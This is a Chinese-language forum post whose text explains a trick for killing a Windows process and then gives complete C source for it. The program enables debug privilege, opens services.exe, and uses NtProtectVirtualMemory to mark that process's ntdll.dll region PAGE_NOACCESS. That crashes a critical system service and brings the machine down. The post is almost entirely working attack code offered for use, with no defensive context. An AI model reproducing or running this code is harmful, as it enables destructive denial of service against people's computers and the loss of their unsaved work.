- 注册时间
- 2010-8-21
- 最后登录
- 2017-5-28
- 在线时间
- 3 小时
编程入门
- 魔鬼币
- 605
|
原理很简单,用PROCESS_VM_OPERATION打开目标进程(没必要PROCESS_ALL_ACCESS),把目标进程的ntdll.dll设为不能访问
#include <stdio.h>
#include <Windows.h>
#include <Psapi.h>
#include <Tlhelp32.h>
#pragma comment(lib,"Psapi.lib")
typedef NTSTATUS (__stdcall *RtlAdjustPrivilege_)(
ULONG Privilege,
BOOLEAN Enable,
BOOLEAN CurrentThread,
PBOOLEAN Enabled
);
RtlAdjustPrivilege_ RtlAdjustPrivilege = NULL;
typedef NTSTATUS (__stdcall *NtProtectVirtualMemory_)(
__in HANDLE ProcessHandle,
__inout PVOID *BaseAddress,
__inout PSIZE_T RegionSize,
__in ULONG NewProtectWin32,
__out PULONG OldProtect
);
NtProtectVirtualMemory_ NtProtectVirtualMemory = NULL;
ULONG GetPID (WCHAR* proc)
{
BOOL working = 0;
PROCESSENTRY32 lppe = {0};
ULONG targetPid=0;
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS ,0);
if ( hSnapshot )
{
lppe.dwSize = sizeof( lppe );
working = Process32First( hSnapshot, &lppe );
while ( working )
{
if ( _wcsicmp( lppe.szExeFile,proc) ==0 )
{
targetPid = lppe.th32ProcessID;
break;
}
working = Process32Next(hSnapshot,&lppe);
}
}
CloseHandle( hSnapshot );
return targetPid;
}
void main()
{
HMODULE ntdll;
MODULEINFO ModuleInfo;
ntdll = GetModuleHandle( L"ntdll.dll" );
if ( !GetModuleInformation( (HANDLE)-1, ntdll, &ModuleInfo, sizeof(MODULEINFO) ) )
{
return;
}
BOOLEAN Enabled;
RtlAdjustPrivilege = (RtlAdjustPrivilege_)GetProcAddress( ntdll, "RtlAdjustPrivilege" );
if ( RtlAdjustPrivilege ==NULL )
{
return;
}
RtlAdjustPrivilege( 20, TRUE, FALSE, &Enabled );
HANDLE hProc = OpenProcess( PROCESS_VM_OPERATION, FALSE, GetPID(L"services.exe") );
if ( hProc == NULL )
{
return;
}
NtProtectVirtualMemory = (NtProtectVirtualMemory_)GetProcAddress( ntdll, "NtProtectVirtualMemory" );
if ( NtProtectVirtualMemory == NULL )
{
return;
}
ULONG OldProtect;
NtProtectVirtualMemory( hProc, &ModuleInfo.lpBaseOfDll, &ModuleInfo.SizeOfImage, PAGE_NOACCESS, &OldProtect );
}
|
|
发表于 2017-5-28 08:42:15